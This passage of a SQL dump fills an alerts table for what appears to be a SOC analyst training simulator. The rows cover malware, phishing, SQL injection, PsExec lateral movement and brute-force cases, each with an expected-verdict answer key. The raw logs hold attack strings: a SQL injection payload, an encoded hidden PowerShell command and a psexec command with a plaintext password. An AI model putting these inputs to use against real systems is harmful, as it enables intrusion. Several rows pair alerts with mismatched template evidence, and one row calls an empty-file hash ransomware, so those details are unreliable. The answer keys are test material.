trojan\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with malicious remote access activity\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and associated IP are known indicators of a remote access trojan.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(645, 'Data Exfiltration Attempt via Email', 'critical', 'Email Gateway', 'Sensitive data was detected in an outgoing email, indicating a potential data exfiltration attempt.', 'Data Exfil', 'T1020', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T12:45:00Z\",\"event_type\":\"email_sent\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"203.0.113.101\",\"username\":\"alice\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"alice@company.com\",\"email_recipient\":\"external@unknown.com\",\"file_attachment\":\"confidential_data.pdf\",\"file_hash\":\"def4567890abcdef1234567890abcdef\"}', '2026-01-11 00:45:12', '2026-02-16 18:03:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"external@unknown.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized external recipient\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"def4567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash flagged for containing sensitive data\"}}],\"expected_actions\":[\"block_sender\",\"quarantine_email\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The email contains sensitive data and was sent to an unrecognized recipient, indicating data exfiltration.\"}', 'Beginner', 'DLP', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Data Exfiltration Attempt via Email\",\"date\":\"2026-02-01T20:32:22.288Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(646, 'False Positive: Legitimate Application Update', 'low', 'EDR', 'A process execution alert was triggered for a legitimate application update process.', 'Malware', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-11T15:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"10.0.0.20\",\"username\":\"system\",\"hostname\":\"UPDATE-SERVER\",\"command_line\":\"C:\\\\Program Files\\\\App\\\\update.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-01-09 22:44:23', '2026-03-07 05:19:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash matches legitimate application update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\App\\\\update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Confirmed as part of legitimate application update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution is part of a verified application update, confirming it as a false positive.\"}', 'Beginner', 'EDR', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(647, 'Lateral Movement Detected via PSExec', 'critical', 'SIEM', 'Lateral movement was detected within the network using PSExec from one internal host to another, indicating potential compromise.', 'Lateral Movement', 'T1569', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.60\",\"dst_ip\":\"192.168.1.70\",\"username\":\"administrator\",\"hostname\":\"COMPROMISE-PC\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\"}', '2026-01-10 01:41:05', '2026-02-16 18:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of potentially compromised host initiating lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP of targeted host for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command used for unauthorized lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec to execute commands remotely indicates malicious lateral movement.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.290Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.60\\\",\\\"dst_ip\\\":\\\"192.168.1.70\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"COMPROMISE-PC\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.70 -u administrator -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(648, 'False Positive: Unusual Login from Expected Location', 'low', 'Firewall', 'An unusual login was flagged due to an unexpected IP, but the user confirmed it was a legitimate access from a known location.', 'Brute Force', 'T1078', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-11T16:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.75\",\"dst_ip\":\"10.0.0.25\",\"username\":\"susan\",\"hostname\":\"CORP-SERVER\"}', '2026-01-09 21:55:34', '2026-03-07 05:18:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address associated with legitimate user access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"susan\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User confirmed access from known location\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login was verified by the user as legitimate, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(649, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A potentially malicious PowerShell script was executed on the endpoint, indicating possible malware activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AdQBtAGUAcgBpAGMAcwBdADoAOgBuAG8AcgBtADAANABdAC0A\"}', '2026-01-10 16:38:54', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AdQBtAGUAcgBpAGMAcwBdADoAOgBuAG8AcgBtADAANABdAC0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PowerShell command used in known malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is encoded and matches known malicious patterns.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(650, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email containing a malicious link was received by user jsmith, potentially leading to credential theft.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:25:48Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"\",\"username\":\"jsmith\",\"hostname\":\"\",\"email_sender\":\"no-reply@fakebank.com\",\"url\":\"http://malicious-link.fakebank.com\"}', '2026-01-10 14:31:51', '2026-02-16 18:04:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to phishing site mimicking a banking login page\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain closely resembles a legitimate bank\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site mimicking a bank.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Link Detected\",\"date\":\"2026-02-01T20:32:22.294Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(651, 'SQL Injection Attempt on Web Application', 'high', 'Wazuh', 'An attacker attempted a SQL injection attack on the company\'s public web application, trying to access the database.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:13:09Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"\",\"hostname\":\"\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 04:54:32', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 112 times for SQL injection attacks\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic SQL injection pattern used to bypass login forms.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.295Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:13:09Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(652, 'Brute Force Attack on RDP Detected', 'medium', 'Splunk', 'Multiple failed login attempts detected on the RDP service, indicating a potential brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"server-01\",\"failed_attempts\":25}', '2026-01-10 09:48:45', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Common administrative username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is involved in multiple brute force campaigns, attempting to compromise admin accounts.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.296Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(653, 'Malware Execution via Suspicious EXE', 'critical', 'EDR', 'A suspicious executable was detected running on the endpoint, showing signs of malware infection and potential data exfiltration.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T13:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"awilliams\",\"hostname\":\"laptop-02\",\"command_line\":\"C:\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 11:03:21', '2026-02-16 18:02:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known ransomware variant\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable exhibits behavior typical of ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable hash is linked to ransomware, requiring immediate isolation and investigation.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
